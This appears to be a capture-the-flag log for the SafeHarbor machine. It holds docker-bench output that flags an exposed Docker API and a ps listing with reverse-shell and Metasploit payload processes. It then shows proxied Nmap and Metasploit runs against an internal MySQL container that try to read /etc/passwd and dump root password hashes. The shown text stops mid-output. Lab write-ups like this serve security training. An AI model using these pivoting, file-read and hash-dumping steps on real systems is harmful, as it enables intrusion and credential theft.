[WARN]      * Container running without CPU restrictions: harborbank_kibana_1
[WARN]      * Container running without CPU restrictions: harborbank_logstash_1
[WARN]      * Container running without CPU restrictions: harborbank_nginx_1
[WARN]      * Container running without CPU restrictions: harborbank_apache_v2_2
[WARN]      * Container running without CPU restrictions: harborbank_apache_v2_1
[WARN]      * Container running without CPU restrictions: harborbank_apache_1
[WARN]      * Container running without CPU restrictions: harborbank_elasticsearch_1
[WARN]      * Container running without CPU restrictions: harborbank_mysql_1
[WARN]      * Container running without CPU restrictions: harborbank_php_1
[WARN] 5.12  - Ensure that the container's root filesystem is mounted as read only
[WARN]      * Container running with root FS mounted R/W: harborbank_kibana_1
[WARN]      * Container running with root FS mounted R/W: harborbank_logstash_1
[WARN]      * Container running with root FS mounted R/W: harborbank_nginx_1
[WARN]      * Container running with root FS mounted R/W: harborbank_apache_v2_2
[WARN]      * Container running with root FS mounted R/W: harborbank_apache_v2_1
[WARN]      * Container running with root FS mounted R/W: harborbank_apache_1
[WARN]      * Container running with root FS mounted R/W: harborbank_elasticsearch_1
[WARN]      * Container running with root FS mounted R/W: harborbank_mysql_1
[WARN]      * Container running with root FS mounted R/W: harborbank_php_1
[WARN] 5.13  - Ensure that incoming container traffic is bound to a specific host interface
[WARN]      * Port being bound to wildcard IP: 0.0.0.0 in harborbank_nginx_1
[WARN] 5.14  - Ensure that the 'on-failure' container restart policy is set to '5'
[WARN]      * MaximumRetryCount is not set to 5: harborbank_kibana_1
[WARN]      * MaximumRetryCount is not set to 5: harborbank_logstash_1
[WARN]      * MaximumRetryCount is not set to 5: harborbank_nginx_1
[WARN]      * MaximumRetryCount is not set to 5: harborbank_apache_v2_2
[WARN]      * MaximumRetryCount is not set to 5: harborbank_apache_v2_1
[WARN]      * MaximumRetryCount is not set to 5: harborbank_apache_1
[WARN]      * MaximumRetryCount is not set to 5: harborbank_elasticsearch_1
[WARN]      * MaximumRetryCount is not set to 5: harborbank_mysql_1
[WARN]      * MaximumRetryCount is not set to 5: harborbank_php_1
[PASS] 5.15  - Ensure the host's process namespace is not shared
[PASS] 5.16  - Ensure the host's IPC namespace is not shared
[PASS] 5.17  - Ensure that host devices are not directly exposed to containers
[INFO] 5.18  - Ensure that the default ulimit is overwritten at runtime if needed
[INFO]      * Container no default ulimit override: harborbank_kibana_1
[INFO]      * Container no default ulimit override: harborbank_logstash_1
[INFO]      * Container no default ulimit override: harborbank_nginx_1
[INFO]      * Container no default ulimit override: harborbank_apache_v2_2
[INFO]      * Container no default ulimit override: harborbank_apache_v2_1
[INFO]      * Container no default ulimit override: harborbank_apache_1
[INFO]      * Container no default ulimit override: harborbank_elasticsearch_1
[INFO]      * Container no default ulimit override: harborbank_mysql_1
[INFO]      * Container no default ulimit override: harborbank_php_1
[PASS] 5.19  - Ensure mount propagation mode is not set to shared
[PASS] 5.20  - Ensure the host's UTS namespace is not shared
[PASS] 5.21  - Ensure the default seccomp profile is not Disabled
[NOTE] 5.22  - Ensure docker exec commands are not used with privileged option
[NOTE] 5.23  - Ensure that docker exec commands are not used with the user=root option
[PASS] 5.24  - Ensure that cgroup usage is confirmed
[WARN] 5.25  - Ensure that the container is restricted from acquiring additional privileges
[WARN]      * Privileges not restricted: harborbank_kibana_1
[WARN]      * Privileges not restricted: harborbank_logstash_1
[WARN]      * Privileges not restricted: harborbank_nginx_1
[WARN]      * Privileges not restricted: harborbank_apache_v2_2
[WARN]      * Privileges not restricted: harborbank_apache_v2_1
[WARN]      * Privileges not restricted: harborbank_apache_1
[WARN]      * Privileges not restricted: harborbank_elasticsearch_1
[WARN]      * Privileges not restricted: harborbank_mysql_1
[WARN]      * Privileges not restricted: harborbank_php_1
[WARN] 5.26  - Ensure that container health is checked at runtime
[WARN]      * Health check not set: harborbank_kibana_1
[WARN]      * Health check not set: harborbank_logstash_1
[WARN]      * Health check not set: harborbank_nginx_1
[WARN]      * Health check not set: harborbank_apache_v2_2
[WARN]      * Health check not set: harborbank_apache_v2_1
[WARN]      * Health check not set: harborbank_apache_1
[WARN]      * Health check not set: harborbank_elasticsearch_1
[WARN]      * Health check not set: harborbank_mysql_1
[WARN]      * Health check not set: harborbank_php_1
[INFO] 5.27  - Ensure that Docker commands always make use of the latest version of their image
[WARN] 5.28  - Ensure that the PIDs cgroup limit is used
[WARN]      * PIDs limit not set: harborbank_kibana_1
[WARN]      * PIDs limit not set: harborbank_logstash_1
[WARN]      * PIDs limit not set: harborbank_nginx_1
[WARN]      * PIDs limit not set: harborbank_apache_v2_2
[WARN]      * PIDs limit not set: harborbank_apache_v2_1
[WARN]      * PIDs limit not set: harborbank_apache_1
[WARN]      * PIDs limit not set: harborbank_elasticsearch_1
[WARN]      * PIDs limit not set: harborbank_mysql_1
[WARN]      * PIDs limit not set: harborbank_php_1
[PASS] 5.29  - Ensure that Docker's default bridge 'docker0' is not used
[PASS] 5.30  - Ensure that the host's user namespaces are not shared
[PASS] 5.31  - Ensure that the Docker socket is not mounted inside any containers


[INFO] 6 - Docker Security Operations
[INFO] 6.1  - Ensure that image sprawl is avoided
[INFO]      * There are currently: 16 images
[INFO] 6.2  - Ensure that container sprawl is avoided
[INFO]      * There are currently a total of 9 containers, with 9 of them currently running


[INFO] 7 - Docker Swarm Configuration
[PASS] 7.1  - Ensure swarm mode is not Enabled, if not needed
[PASS] 7.2  - Ensure that the minimum number of manager nodes have been created in a swarm (Swarm mode not enabled)
[PASS] 7.3  - Ensure that swarm services are bound to a specific host interface (Swarm mode not enabled)
[PASS] 7.4  - Ensure that all Docker swarm overlay networks are encrypted
[PASS] 7.5  - Ensure that Docker's secret management commands are used for managing secrets in a swarm cluster (Swarm mode not enabled)
[PASS] 7.6  - Ensure that swarm manager is run in auto-lock mode (Swarm mode not enabled)
[PASS] 7.7  - Ensure that the swarm manager auto-lock key is rotated periodically (Swarm mode not enabled)
[PASS] 7.8  - Ensure that node certificates are rotated as appropriate (Swarm mode not enabled)
[PASS] 7.9  - Ensure that CA certificates are rotated as appropriate (Swarm mode not enabled)
[PASS] 7.10  - Ensure that management plane traffic is separated from data plane traffic (Swarm mode not enabled)


[INFO] 8 - Docker Enterprise Configuration
[INFO] 8.1 - Universal Control Plane Configuration
[NOTE] 8.1.1  - Configure the LDAP authentication service
[NOTE] 8.1.2  - Use external certificates
[NOTE] 8.1.3  - Enforce the use of client certificate bundles for unprivileged users
[NOTE] 8.1.4  - Configure applicable cluster role-based access control policies
[NOTE] 8.1.5  - Enable signed image enforcement
[NOTE] 8.1.6  - Set the Per-User Session Limit to a value of '3' or lower
[NOTE] 8.1.7  - Set the 'Lifetime Minutes' and 'Renewal Threshold Minutes' values to '15' or lower and '0' respectively


[INFO] 8.2 - Docker Trusted Registry Configuration
[NOTE] 8.2.1  - Enable image vulnerability scanning

[INFO] Checks: 115
[INFO] Score: 14


=> No docker configuration file (/etc/docker/daemon.json) has been created to set secure parameters.
====================================================================================================
root@safeharbor:/tmp/docker-bench-security-master# cd /etc/docker/
root@safeharbor:/etc/docker# ls -al
total 12
drwxr-xr-x  2 root root 4096 Oct  5  2019 .
drwxr-xr-x 96 root root 4096 May  1 22:49 ..
-rw-------  1 root root  244 Oct  5  2019 key.json

=> .. and no secure parameters have been set neither at startup 
================================================================

"/usr/bin/dockerd -H fd:// -H tcp://0.0.0.0:2375"

root@safeharbor:/tmp/docker-bench-security-master# ps -ealwf
F S UID        PID  PPID  C PRI  NI ADDR SZ WCHAN  STIME TTY          TIME CMD
4 S root         1     0  0  80   0 - 19461 ep_pol 15:38 ?        00:00:01 /sbin/init maybe-ubiquity
1 S root         2     0  0  80   0 -     0 kthrea 15:38 ?        00:00:00 [kthreadd]
1 I root         4     2  0  60 -20 -     0 worker 15:38 ?        00:00:00 [kworker/0:0H]
1 I root         6     2  0  60 -20 -     0 rescue 15:38 ?        00:00:00 [mm_percpu_wq]
1 S root         7     2  0  80   0 -     0 smpboo 15:38 ?        00:00:11 [ksoftirqd/0]
1 I root         8     2  0  80   0 -     0 rcu_gp 15:38 ?        00:00:09 [rcu_sched]
1 I root         9     2  0  80   0 -     0 rcu_gp 15:38 ?        00:00:00 [rcu_bh]
1 S root        10     2  0 -40   - -     0 smpboo 15:38 ?        00:00:00 [migration/0]
5 S root        11     2  0 -40   - -     0 smpboo 15:38 ?        00:00:00 [watchdog/0]
1 S root        12     2  0  80   0 -     0 smpboo 15:38 ?        00:00:00 [cpuhp/0]
5 S root        13     2  0  80   0 -     0 devtmp 15:38 ?        00:00:00 [kdevtmpfs]
1 I root        14     2  0  60 -20 -     0 rescue 15:38 ?        00:00:00 [netns]
1 S root        15     2  0  80   0 -     0 rcu_ta 15:38 ?        00:00:00 [rcu_tasks_kthre]
1 S root        16     2  0  80   0 -     0 kaudit 15:38 ?        00:00:00 [kauditd]
1 S root        17     2  0  80   0 -     0 watchd 15:38 ?        00:00:00 [khungtaskd]
1 S root        18     2  0  80   0 -     0 oom_re 15:38 ?        00:00:00 [oom_reaper]
1 I root        19     2  0  60 -20 -     0 rescue 15:38 ?        00:00:00 [writeback]
1 S root        20     2  0  80   0 -     0 kcompa 15:38 ?        00:00:00 [kcompactd0]
1 S root        21     2  0  85   5 -     0 ksm_sc 15:38 ?        00:00:00 [ksmd]
1 S root        22     2  0  99  19 -     0 khugep 15:38 ?        00:00:00 [khugepaged]
1 I root        23     2  0  60 -20 -     0 rescue 15:38 ?        00:00:00 [crypto]
1 I root        24     2  0  60 -20 -     0 rescue 15:38 ?        00:00:00 [kintegrityd]
1 I root        25     2  0  60 -20 -     0 rescue 15:38 ?        00:00:00 [kblockd]
1 I root        26     2  0  60 -20 -     0 rescue 15:38 ?        00:00:00 [ata_sff]
1 I root        27     2  0  60 -20 -     0 rescue 15:38 ?        00:00:00 [md]
1 I root        28     2  0  60 -20 -     0 rescue 15:38 ?        00:00:00 [edac-poller]
1 I root        29     2  0  60 -20 -     0 rescue 15:38 ?        00:00:00 [devfreq_wq]
1 I root        30     2  0  60 -20 -     0 rescue 15:38 ?        00:00:00 [watchdogd]
1 I root        32     2  0  80   0 -     0 worker 15:38 ?        00:00:13 [kworker/0:1]
1 S root        34     2  0  80   0 -     0 kswapd 15:38 ?        00:00:00 [kswapd0]
1 I root        35     2  0  60 -20 -     0 worker 15:38 ?        00:00:00 [kworker/u3:0]
1 S root        36     2  0  80   0 -     0 ecrypt 15:38 ?        00:00:00 [ecryptfs-kthrea]
1 I root        78     2  0  60 -20 -     0 rescue 15:38 ?        00:00:00 [kthrotld]
1 I root        79     2  0  60 -20 -     0 rescue 15:38 ?        00:00:00 [acpi_thermal_pm]
1 S root        80     2  0  80   0 -     0 scsi_e 15:38 ?        00:00:00 [scsi_eh_0]
1 I root        81     2  0  60 -20 -     0 rescue 15:38 ?        00:00:00 [scsi_tmf_0]
1 S root        82     2  0  80   0 -     0 scsi_e 15:38 ?        00:00:00 [scsi_eh_1]
1 I root        83     2  0  60 -20 -     0 rescue 15:38 ?        00:00:00 [scsi_tmf_1]
1 I root        89     2  0  60 -20 -     0 rescue 15:38 ?        00:00:00 [ipv6_addrconf]
1 I root        98     2  0  60 -20 -     0 rescue 15:38 ?        00:00:00 [kstrp]
1 I root       115     2  0  60 -20 -     0 rescue 15:38 ?        00:00:00 [charger_manager]
1 I root       174     2  0  60 -20 -     0 worker 15:38 ?        00:00:00 [kworker/0:1H]
1 S root       195     2  0  80   0 -     0 scsi_e 15:38 ?        00:00:00 [scsi_eh_2]
1 I root       196     2  0  60 -20 -     0 rescue 15:38 ?        00:00:00 [scsi_tmf_2]
1 I root       197     2  0  60 -20 -     0 rescue 15:38 ?        00:00:00 [ttm_swap]
1 S root       198     2  0   9   - -     0 irq_th 15:38 ?        00:00:00 [irq/18-vmwgfx]
1 I root       268     2  0  60 -20 -     0 rescue 15:38 ?        00:00:00 [raid5wq]
1 S root       320     2  0  80   0 -     0 kjourn 15:38 ?        00:00:00 [jbd2/sda2-8]
1 I root       321     2  0  60 -20 -     0 rescue 15:38 ?        00:00:00 [ext4-rsv-conver]
4 S root       390     1  0  79  -1 - 23792 ep_pol 15:38 ?        00:00:00 /lib/systemd/systemd-journald
1 I root       393     2  0  60 -20 -     0 rescue 15:38 ?        00:00:00 [iscsi_eh]
4 S root       399     1  0  80   0 - 24427 poll_s 15:38 ?        00:00:00 /sbin/lvmetad -f
1 I root       400     2  0  60 -20 -     0 rescue 15:38 ?        00:00:00 [ib-comp-wq]
1 I root       402     2  0  60 -20 -     0 rescue 15:38 ?        00:00:00 [ib-comp-unb-wq]
1 I root       403     2  0  60 -20 -     0 rescue 15:38 ?        00:00:00 [ib_mcast]
1 I root       404     2  0  60 -20 -     0 rescue 15:38 ?        00:00:00 [ib_nl_sa_wq]
4 S root       405     1  0  80   0 - 11393 ep_pol 15:38 ?        00:00:00 /lib/systemd/systemd-udevd
1 I root       413     2  0  60 -20 -     0 rescue 15:38 ?        00:00:00 [rdma_cm]
1 S root       444     2  0  60 -20 -     0 kthrea 15:38 ?        00:00:00 [loop0]
1 S root       445     2  0  60 -20 -     0 kthrea 15:38 ?        00:00:00 [loop1]
4 S systemd+   448     1  0  80   0 - 35483 ep_pol 15:38 ?        00:00:00 /lib/systemd/systemd-timesyncd
1 I root       542     2  0  60 -20 -     0 rescue 15:38 ?        00:00:00 [iprt-VBoxWQueue]
4 S systemd+   639     1  0  80   0 - 20043 ep_pol 15:39 ?        00:00:00 /lib/systemd/systemd-networkd
4 S systemd+   640     1  0  80   0 - 17659 ep_pol 15:39 ?        00:00:00 /lib/systemd/systemd-resolved
4 S root       739     1  0  80   0 - 42276 poll_s 15:39 ?        00:00:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
4 S root       741     1  0  80   0 - 23885 futex_ 15:39 ?        00:00:00 /usr/bin/lxcfs /var/lib/lxcfs/
4 S root       746     1  0  80   0 - 158730 futex_ 15:39 ?       00:00:01 /usr/lib/snapd/snapd
4 S syslog     747     1  0  80   0 - 65760 poll_s 15:39 ?        00:00:00 /usr/sbin/rsyslogd -n
4 S root       748     1  0  80   0 - 17648 ep_pol 15:39 ?        00:00:00 /lib/systemd/systemd-logind
4 S root       750     1  0  80   0 - 71564 poll_s 15:39 ?        00:00:00 /usr/lib/accountsservice/accounts-daemon
4 S daemon     753     1  0  80   0 -  7083 hrtime 15:39 ?        00:00:00 /usr/sbin/atd -f
4 S root       761     1  0  80   0 -  7507 hrtime 15:39 ?        00:00:00 /usr/sbin/cron -f
4 S message+   764     1  0  80   0 - 12537 ep_pol 15:39 ?        00:00:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
4 S root       775     1  0  80   0 - 46487 poll_s 15:39 ?        00:00:00 /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal
4 S root       778     1  0  80   0 - 18075 poll_s 15:39 ?        00:00:00 /usr/sbin/sshd -D
4 S root       784     1  0  80   0 - 184342 futex_ 15:39 ?       00:00:05 /usr/bin/containerd
4 S root       797     1  0  80   0 -  3722 poll_s 15:39 tty1     00:00:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
4 S root       805     1  0  80   0 - 72221 poll_s 15:39 ?        00:00:00 /usr/lib/policykit-1/polkitd --no-debug
4 S root       982     1  0  80   0 - 201134 futex_ 15:39 ?       00:00:22 /usr/bin/dockerd -H fd:// -H tcp://0.0.0.0:2375
4 S root      1476   784  0  80   0 -  2686 futex_ 15:39 ?        00:00:00 containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/9b4ff6556afc08b61ac429b6c512e
4 S root      1503  1476  0  80   0 -  5690 sigsus 15:39 ?        00:00:00 nginx: master process nginx -g daemon off;
5 S systemd+  1592  1503  0  80   0 -  5799 ep_pol 15:39 ?        00:00:01 nginx: worker process
4 S root      1613   982  0  80   0 - 113414 futex_ 15:39 ?       00:00:00 /usr/bin/docker-proxy -proto udp -host-ip 127.0.0.1 -host-port 12201 -container-ip 172.20.0.3 -container-port 12201
4 S root      1620   784  0  80   0 -  2686 futex_ 15:39 ?        00:00:00 containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/b4c0d2425a60b6a4ad063705fd094
4 S absozed   1646  1620  0  80   0 - 806146 futex_ 15:39 ?       00:03:31 /bin/java -Xms1g -Xmx1g -XX:+UseConcMarkSweepGC -XX:CMSInitiatingOccupancyFraction=75 -XX:+UseCMSInitiatingOccupancyOnly -Djav
4 S root      1923   784  0  80   0 -  2686 futex_ 15:39 ?        00:00:00 containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/3b769e48d9b9020764949659240ee
4 S root      1948  1923  0  80   0 - 16856 poll_s 15:39 ?        00:00:01 httpd -DFOREGROUND
4 S root      2047   784  0  80   0 -  2686 futex_ 15:39 ?        00:00:00 containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/807bb2598bdb6c62a3740d0d9b529
5 S bin       2069  1948  0  80   0 - 17552 pipe_w 15:39 ?        00:00:00 httpd -DFOREGROUND
5 S bin       2070  1948  0  80   0 - 17530 pipe_w 15:39 ?        00:00:00 httpd -DFOREGROUND
5 S bin       2071  1948  0  80   0 - 17530 pipe_w 15:39 ?        00:00:00 httpd -DFOREGROUND
4 S root      2159  2047  0  80   0 - 16856 poll_s 15:39 ?        00:00:01 httpd -DFOREGROUND
5 S bin       2251  2159  0  80   0 - 17530 pipe_w 15:39 ?        00:00:00 httpd -DFOREGROUND
5 S bin       2252  2159  0  80   0 - 17530 pipe_w 15:39 ?        00:00:00 httpd -DFOREGROUND
5 S bin       2253  2159  0  80   0 - 17555 pipe_w 15:39 ?        00:00:00 httpd -DFOREGROUND
4 S root      2336   784  0  80   0 -  2686 futex_ 15:39 ?        00:00:00 containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/e23673b13771b1b4478976952854d
4 S root      2364  2336  0  80   0 - 16856 poll_s 15:39 ?        00:00:01 httpd -DFOREGROUND
5 S bin       2449  2364  0  80   0 - 17555 pipe_w 15:39 ?        00:00:00 httpd -DFOREGROUND
5 S bin       2450  2364  0  80   0 - 17530 pipe_w 15:39 ?        00:00:00 httpd -DFOREGROUND
5 S bin       2451  2364  0  80   0 - 17530 pipe_w 15:39 ?        00:00:00 httpd -DFOREGROUND
4 S root      2534   784  0  80   0 -  2686 futex_ 15:39 ?        00:00:00 containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/782f6cae2a82770972d3fecd2ed17
4 S root      2560  2534  0  80   0 -  5013 wait   15:39 ?        00:00:00 /bin/bash /main.sh default
4 S root      2647  2560  0  80   0 - 504219 futex_ 15:39 ?       00:01:41 /usr/bin/java -Xms256m -Xmx1g -Xss256k -Djava.awt.headless=true -XX:+UseParNewGC -XX:+UseConcMarkSweepGC -XX:CMSInitiatingOccu
4 S root      2669   784  0  80   0 -  2686 futex_ 15:39 ?        00:00:00 containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/a156b802df29676146080b1bb5ce2
4 S 999       2695  2669  0  80   0 - 329401 poll_s 15:39 ?       00:00:10 mysqld
4 S root      2797   784  0  80   0 -  2686 futex_ 15:39 ?        00:00:00 containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/707af7b0d61f3179e76644d34f4b4
4 S root      2823  2797  0  80   0 - 11722 ep_pol 15:39 ?        00:00:01 php-fpm: master process (/usr/local/etc/php-fpm.conf)
5 S 82        2902  2823  0  80   0 - 11742 inet_c 15:39 ?        00:00:00 php-fpm: pool www
5 S 82        2903  2823  0  80   0 - 11742 pipe_w 15:39 ?        00:00:00 php-fpm: pool www
0 S root      2935  2560  0  80   0 -  1069 hrtime 15:39 ?        00:00:01 tail -f ./elasticsearch/logs/elasticsearch.log
4 S root      2985   982  0  80   0 - 94717 futex_ 15:39 ?        00:00:00 /usr/bin/docker-proxy -proto tcp -host-ip 0.0.0.0 -host-port 80 -container-ip 172.20.0.8 -container-port 80
4 S root      2992   784  0  80   0 -  2686 futex_ 15:39 ?        00:00:00 containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/fc8a23e22eda1c193b87b357c5d33
4 S root      3018  2992  0  80   0 -  2690 sigsus 15:39 ?        00:00:00 nginx: master process nginx -g daemon off;
5 S systemd+  3084  3018  0  80   0 -  2808 ep_pol 15:39 ?        00:00:00 nginx: worker process
0 S 82        3336  2903  0  80   0 -   391 wait   15:44 ?        00:00:00 sh -c exec 2>&1; ./reverseshell.elf
0 S 82        3337  3336  0  80   0 -   565 poll_s 15:44 ?        00:02:15 ./reverseshell.elf
5 S bin       3338  1948  0  80   0 - 17555 pipe_w 15:44 ?        00:00:00 httpd -DFOREGROUND
5 S 82        6232  2823  0  80   0 - 11726 inet_c 17:25 ?        00:00:00 php-fpm: pool www
0 S root     11906  2560  0  80   0 - 393518 futex_ 20:51 ?       00:00:07 /usr/lib/jvm/java-7-openjdk-amd64/jre/bin/java -classpath /tmp/~spawn6086978643545029933.tmp.dir metasploit.Payload
1 I root     14636     2  0  80   0 -     0 worker 21:47 ?        00:00:00 [kworker/u2:1]
1 I root     17393     2  0  80   0 -     0 worker 22:50 ?        00:00:00 [kworker/0:0]
4 S root     17443   778  0  80   0 - 26422 poll_s 22:50 ?        00:00:00 sshd: absozed [priv]
4 S absozed  17446     1  0  80   0 - 19261 ep_pol 22:50 ?        00:00:00 /lib/systemd/systemd --user
5 S absozed  17455 17446  0  80   0 - 27957 sigtim 22:50 ?        00:00:00 (sd-pam)
5 S absozed  17572 17443  0  80   0 - 26997 poll_s 22:50 ?        00:00:00 sshd: absozed@pts/0
0 S absozed  17574 17572  0  80   0 -  5365 wait   22:50 pts/0    00:00:00 -bash
4 S root     17588 17574  0  80   0 - 15616 poll_s 22:50 pts/0    00:00:00 sudo su
1 I root     17590     2  0  80   0 -     0 worker 22:50 ?        00:00:00 [kworker/u2:0]
4 S root     17591 17588  0  80   0 - 15439 wait   22:51 pts/0    00:00:00 su
4 S root     17592 17591  0  80   0 -  5045 wait   22:51 pts/0    00:00:00 bash
1 I root     23346     2  0  80   0 -     0 worker 22:56 ?        00:00:00 [kworker/u2:2]
4 R root     23461 17592  0  80   0 -  9594 -      23:00 pts/0    00:00:00 ps -ealwf




====================================== Container - MySQL DB ===============================================

jeff@kali:~/Documents/CTFs/SafeHarbor$ sudo proxychains nmap -Pn -v -sT -sV -n -p 3306 172.20.0.138
ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-01 05:06 CEST
NSE: Loaded 45 scripts for scanning.
Initiating Connect Scan at 05:06
Scanning 172.20.0.138 [1 port]
|S-chain|-<>-127.0.0.1:8080-<><>-172.20.0.138:3306-<><>-OK
Discovered open port 3306/tcp on 172.20.0.138
Completed Connect Scan at 05:06, 0.03s elapsed (1 total ports)
Initiating Service scan at 05:06
Scanning 1 service on 172.20.0.138
|S-chain|-<>-127.0.0.1:8080-<><>-172.20.0.138:3306-<><>-OK
Completed Service scan at 05:06, 0.15s elapsed (1 service on 1 host)
NSE: Script scanning 172.20.0.138.
Initiating NSE at 05:06
Completed NSE at 05:06, 0.00s elapsed
Initiating NSE at 05:06
Completed NSE at 05:06, 0.00s elapsed
Nmap scan report for 172.20.0.138
Host is up (0.028s latency).

PORT     STATE SERVICE VERSION
3306/tcp open  mysql   MySQL 5.6.40

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.51 seconds


msf5 auxiliary(admin/mysql/mysql_sql) > options

Module options (auxiliary/admin/mysql/mysql_sql):

   Name      Current Setting                                                Required  Description
   ----      ---------------                                                --------  -----------
   PASSWORD  TestPass123!                                                   no        The password for the specified username
   RHOSTS    172.20.0.138                                                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     3306                                                           yes       The target port (TCP)
   SQL       select load_file('/etc/passwd') into outfile '/tmp/test.txt';  yes       The SQL to execute.
   USERNAME  root                                                           no        The username to authenticate as

msf5 auxiliary(admin/mysql/mysql_sql) > run
[*] Running module against 172.20.0.138

[*] 172.20.0.138:3306 - Sending statement: 'select load_file('/etc/passwd') into outfile '/tmp/test.txt';'...
[-] 172.20.0.138:3306 - MySQL Error: RbMysql::OptionPreventsStatement The MySQL server is running with the --secure-file-priv option so it cannot execute this statement
[*] Auxiliary module execution completed

=> The MySQL server has been started with the "--secure-file-priv" option which basically limits from which directories we can load files 

msf5 auxiliary(admin/mysql/mysql_sql) > options

Module options (auxiliary/admin/mysql/mysql_sql):

   Name      Current Setting            Required  Description
   ----      ---------------            --------  -----------
   PASSWORD  TestPass123!               no        The password for the specified username
   RHOSTS    172.20.0.138               yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     3306                       yes       The target port (TCP)
   SQL       select * from mysql.user;  yes       The SQL to execute.
   USERNAME  root                       no        The username to authenticate as

msf5 auxiliary(admin/mysql/mysql_sql) > run
[*] Running module against 172.20.0.138

[*] 172.20.0.138:3306 - Sending statement: 'select * from mysql.user;'...
[*] 172.20.0.138:3306 -  | localhost | root | *F20B31125A91203904A57F21129CD8972CDE7FD3 | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y |  |  |  |  | 0 | 0 | 0 | 0 | mysql_native_password |  | N |
[*] 172.20.0.138:3306 -  | % | root | *F20B31125A91203904A57F21129CD8972CDE7FD3 | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y |  |  |  |  | 0 | 0 | 0 | 0 | mysql_native_password |  | N |
[*] Auxiliary module execution completed


msf5 auxiliary(admin/mysql/mysql_sql) > search mysql

Matching Modules
================

   #   Name                                                  Disclosure Date  Rank       Check  Description
   -   ----                                                  ---------------  ----       -----  -----------
   0   auxiliary/admin/http/manageengine_pmp_privesc         2014-11-08       normal     Yes    ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection
   1   auxiliary/admin/http/rails_devise_pass_reset          2013-01-28       normal     No     Ruby on Rails Devise Authentication Password Reset
   2   auxiliary/admin/mysql/mysql_enum                                       normal     No     MySQL Enumeration Module
   3   auxiliary/admin/mysql/mysql_sql                                        normal     No     MySQL SQL Generic Query
   4   auxiliary/admin/tikiwiki/tikidblib                    2006-11-01       normal     No     TikiWiki Information Disclosure
   5   auxiliary/analyze/crack_databases                                      normal     No     Password Cracker: Databases
   6   auxiliary/gather/joomla_weblinks_sqli                 2014-03-02       normal     Yes    Joomla weblinks-categories Unauthenticated SQL Injection Arbitrary File Read
   7   auxiliary/scanner/mysql/mysql_authbypass_hashdump     2012-06-09       normal     No     MySQL Authentication Bypass Password Dump
   8   auxiliary/scanner/mysql/mysql_file_enum                                normal     No     MYSQL File/Directory Enumerator
   9   auxiliary/scanner/mysql/mysql_hashdump                                 normal     No     MYSQL Password Hashdump
   10  auxiliary/scanner/mysql/mysql_login                                    normal     No     MySQL Login Utility
   11  auxiliary/scanner/mysql/mysql_schemadump                               normal     No     MYSQL Schema Dump
   12  auxiliary/scanner/mysql/mysql_version                                  normal     No     MySQL Server Version Enumeration
   13  auxiliary/scanner/mysql/mysql_writable_dirs                            normal     No     MYSQL Directory Write Test
   14  auxiliary/server/capture/mysql                                         normal     No     Authentication Capture: MySQL
   15  exploit/linux/http/librenms_collectd_cmd_inject       2019-07-15       excellent  Yes    LibreNMS Collectd Command Injection
   16  exploit/linux/mysql/mysql_yassl_getname               2010-01-25       good       No     MySQL yaSSL CertDecoder::GetName Buffer Overflow
   17  exploit/linux/mysql/mysql_yassl_hello                 2008-01-04       good       No     MySQL yaSSL SSL Hello Message Buffer Overflow
   18  exploit/multi/http/manage_engine_dc_pmp_sqli          2014-06-08       excellent  Yes    ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection
   19  exploit/multi/http/wp_db_backup_rce                   2019-04-24       excellent  Yes    WP Database Backup RCE
   20  exploit/multi/http/zpanel_information_disclosure_rce  2014-01-30       excellent  No     Zpanel Remote Unauthenticated RCE
   21  exploit/multi/mysql/mysql_udf_payload                 2009-01-16       excellent  No     Oracle MySQL UDF Payload Execution
   22  exploit/unix/webapp/kimai_sqli                        2013-05-21       average    Yes    Kimai v0.9.2 'db_restore.php' SQL Injection
   23  exploit/unix/webapp/wp_google_document_embedder_exec  2013-01-03       normal     Yes    WordPress Plugin Google Document Embedder Arbitrary File Disclosure
   24  exploit/windows/mysql/mysql_mof                       2012-12-01       excellent  Yes    Oracle MySQL for Microsoft Windows MOF Execution
   25  exploit/windows/mysql/mysql_start_up                  2012-12-01       excellent  Yes    Oracle MySQL for Microsoft Windows FILE Privilege Abuse
   26  exploit/windows/mysql/mysql_yassl_hello               2008-01-04       average    No     MySQL yaSSL SSL Hello Message Buffer Overflow
   27  exploit/windows/mysql/scrutinizer_upload_exec         2012-07-27       excellent  Yes    Plixer Scrutinizer NetFlow and sFlow Analyzer 9 Default MySQL Credential
   28  post/linux/gather/enum_configs                                         normal     No     Linux Gather Configurations
   29  post/linux/gather/enum_users_history                                   normal     No     Linux Gather User History
   30  post/multi/manage/dbvis_add_db_admin                                   normal     No     Multi Manage DbVisualizer Add Db Admin


msf5 auxiliary(admin/mysql/mysql_enum) > options

Module options (auxiliary/admin/mysql/mysql_enum):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
